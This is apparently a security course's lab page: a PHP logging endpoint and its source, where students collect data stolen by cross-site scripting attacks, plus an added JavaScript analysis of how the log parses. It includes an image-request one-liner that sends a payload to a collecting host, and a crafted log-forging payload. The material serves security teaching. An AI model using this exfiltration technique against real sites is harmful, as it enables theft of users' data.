You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.566/2026/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
header("Access-Control-Allow-Origin: *");

do {
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2026-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }

    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2026/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
<head>
  <link rel="stylesheet" type="text/css" href="labs.css" />
  <title>Lab 4 Logging Script</title>
</head>
<body>
<h1>Lab 4 Logging Script</h1>

<p>
  You can use this server side script to extract data from client-side
  JavaScript. For example, clicking this client-side hyperlink will cause the
  server to log the payload:
</p>

<pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>

<p>
  The random argument is ignored, but ensures that the browser bypasses its
  cache when downloading the image. We suggest that you use the random
  argument in your scripts as well. The ID argument will help you distinguish
  your log entries from those sent by other students; we suggest picking your
  MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links;
  if this bothers you, try
  <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
</p>

<h2>Test form</h2>

<p>
  If you just want to try out the script, you can use this form. (For your
  actual attacks in lab 4, you'll probably want to use the JavaScript image
  technique shown above.)
</p>

<form method="GET" action="">
  <label for="id">ID:</label><br />
  <input name="id" placeholder="your-mit-username" size="40" />
  <i>(some identifier to locate your payload in the log)</i>
  <br />
  <br />
  <label for="payload">Payload:</label><br />
  <input name="payload" placeholder="some-string" size="40" />
  <i>(the information you stole)</i>
  <br />
  <input type="submit" value="Log" name="log_submit" />
</form>

<h2>Logged entries</h2>

<p>
  Below are the most recent logged entries, so that you can check if your
  attack worked:
</p>

<pre class="tty"><?php
    $lines = file_get_contents("/tmp/6.566-2026-logger.txt");
    echo htmlspecialchars($lines);
?></pre>

<h2>Source code</h2>

<p>In case you are curious, here is the source code of this page.</p>

<pre><?php highlight_file(__FILE__); ?></pre>
</body>
</html>
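How the log line written by the source above behaves when it is read back, as an added example that is not part of the course's code: `neutralize`, `formatEntry`, `parseLog` and the sample entries are names and data constructed here. It shows that the CR/LF replacement keeps a crafted payload on one line, while the unescaped `": "` separator leaves the boundary between id and payload ambiguous for anyone parsing the file.

```javascript
// Added example, not the course's code. It mirrors two steps of the PHP source:
// the CR/LF replacement and the "<date>: <id>: <payload>" line it writes.

// Same neutralisation the PHP applies to id and payload before writing.
function neutralize(field) {
  return field.replace(/[\r\n]/g, '.');
}

// Build one log line the way the fwrite() call does (date passed in as text).
function formatEntry(date, id, payload) {
  return `${date}: ${neutralize(id)}: ${neutralize(payload)}\n`;
}

// DATE_RFC2822 has a fixed shape, e.g. "Tue, 16 Jun 2026 04:21:55 +0000".
const ENTRY = /^([A-Z][a-z]{2}, \d{2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*)$/s;

// Parse a log file into entries. The id is taken up to the first ": "; an
// entry is flagged ambiguous when ": " occurs again in what remains.
function parseLog(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    if (line === '') continue;
    const m = ENTRY.exec(line);
    const cut = m ? m[2].indexOf(': ') : -1;
    if (cut < 0) { entries.push({ raw: line, malformed: true }); continue; }
    const payload = m[2].slice(cut + 2);
    entries.push({
      date: m[1],
      id: m[2].slice(0, cut),
      payload,
      ambiguous: payload.includes(': '),
    });
  }
  return entries;
}

// Constructed sample input (not real log data).
const DATE = 'Tue, 16 Jun 2026 04:21:55 +0000';
const sampleLog =
  formatEntry(DATE, 'my-username', 'some-string') +
  // A payload carrying CR/LF plus a fake entry still lands on a single line.
  formatEntry(DATE, 'my-username', `x\r\n${DATE}: grader: forged`) +
  // ": " is not neutralised, so this id/payload split cannot be recovered.
  formatEntry(DATE, 'a: b', 'c');

console.log(parseLog(sampleLog));
```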